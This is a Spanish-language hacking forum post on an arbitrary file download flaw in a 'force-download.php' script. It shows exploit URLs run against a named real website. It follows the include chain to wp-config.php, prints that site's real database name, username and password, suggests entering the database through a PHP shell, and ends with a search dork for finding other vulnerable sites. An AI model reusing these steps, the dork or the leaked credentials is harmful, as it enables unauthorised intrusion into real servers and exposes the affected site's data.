Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.
simplemente tenemos la web:
http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php
http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:
http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:
/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')
http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:
require_once( dirname(__FILE__) . '/wp-load.php' );
http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php
Código:
/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');
/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');
/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');
/** MySQL hostname */
define('DB_HOST', 'localhost');
y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking
dork: "allinurl: "force-download.php?file= .pdf""
